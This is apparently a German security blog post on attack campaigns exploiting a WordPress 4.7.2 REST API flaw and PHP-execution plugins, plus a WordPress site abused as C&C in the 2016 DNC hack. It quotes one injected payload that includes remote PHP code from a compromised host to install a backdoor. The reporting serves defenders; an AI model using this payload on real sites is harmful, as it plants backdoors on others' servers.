Neues zu Hacks per WordPress-Sicherheitslücke

Die WordPress-Entwickler haben ja Ende Januar die Version 4.7.2 veröffentlicht (siehe WordPress Version 4.7.2 verfügbar) mit der stillschweigend eine Sicherheitslücke geschlossen wurde. Jetzt wird bekannt, dass die Lücke in der REST-API für das Einschleusen von Schadcode genutzt wird. Und ein WordPress-Auftritt wurde bei einem älteren Hack als C&C-Server missbraucht.


Anzeige

REST-API-Lücke für Manipulationen genutzt

Die Sicherheitslücke in der REST API von WordPress wurde nach den Beobachtungen des Wordfence-Sicherheitsteams in über 20 Kampagnen genutzt, um Angriffe auf WordPress-Blogs zu fahren. Dabei wurden Inhalte bestehender Seiten verändert. Ich hatte in mehreren Blog-Beiträgen über das Thema berichtet (siehe Linkliste am Artikelende). Eine vollständiger Auflistung der Kampagnen und weitere Details finden sich in diesem Wordfence-Blog-Beitrag.

Aber ich habe doch WordPress 4.7.2?

Im Artikel Neues zu den WordPress-Hacks … hatte ich es bereits anklingen lassen. Es meldeten sich Leute, die WordPress 4.7.2 installiert hatten, aber trotzdem angegriffen wurden. Meine Vermutung: Dass vielleicht nicht alles abgedichtet wurde.

Vor einigen Tagen ist mir von Sucuri der Hinweis auf deren Blog-Beitrag hier zugegangen. Die Hacker schauen, ob die WordPress-Installationen Plugins wie Insert PHP oder Exec- PHP oder ähnlich verwenden. Über die Plugins lässt sich PHP-Code direkt in einen Beitrag einschleusen. Das erleichtert zwar die Anpassung der Seiten, reißt aber auch Sicherheitslücken auf. In einer ersten Kampagne wurde nun beobachtet, dass Hacker versuchten, den folgenden Code zu injizieren.

content:"[insert_php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/insert_php]
[php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/php]",
"id":"61a"}

Der von der kompromittierten französischen Webseite eingebundene Code installiert dann eine Backdoor in der WordPress-Installation. Ziel ist es, über SEO-Spam, Affiliate Links oder eingestreute Werbeeinblendungen Geld zu machen. Bei Sururi gibt man die Empfehlung, auf solche PHP-Plugins zu verzichten und schreibt, dass die Sucuri-Firewall eine WordPress-Installation vor diesen Angriffe schütze. Ein paar Infos finden sich auch in diesem Bleeping Computer-Beitrag. Wer noch nicht auf WordPress 4.7.2 umgestellt hat, fährt also auf Risiko.

Hack der US-Demokraten: WordPress-Server involviert

Und abschließend noch ein Informationshäppchen im Nachgang. Im Sommer 2016 beschäftigte ja die Medien der Hack der US-Demokraten die Medien. Im Vorfeld der US-Präsidentschaftswahlen wurden Dokumente und E-Mails der Demokraten geleaked. Das Department of Homeland Security hat einen Report [PDF] mit Details veröffentlicht. Die Sicherheitsspezialisten von Wordfence haben sich die Details angesehen und diesen Blog-Beitrag veröffentlicht. Dabei wurde ein WordPress-Auftritt gehackt, so dass er als C&C-Server zur Verteilung von Windows-Malware funktionierte.

Ähnliche Artikel:
WordPress Version 4.7.2 verfügbar
WordPress 4.7.2 und die verschwiegene Sicherheitslücke – deutsche Sites betroffen
Neues zu den WordPress-Hacks …


Anzeige


Dieser Beitrag wurde unter Allgemein, Sicherheit, WordPress abgelegt und mit , verschlagwortet. Setze ein Lesezeichen auf den Permalink.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht.

Hinweis: Bitte beachtet die Regeln zum Kommentieren im Blog (Erstkommentare und Verlinktes landet in der Moderation, gebe ich alle paar Stunden frei, SEO-Posts/SPAM lösche ich rigoros). Kommentare abseits des Themas bitte unter Diskussion.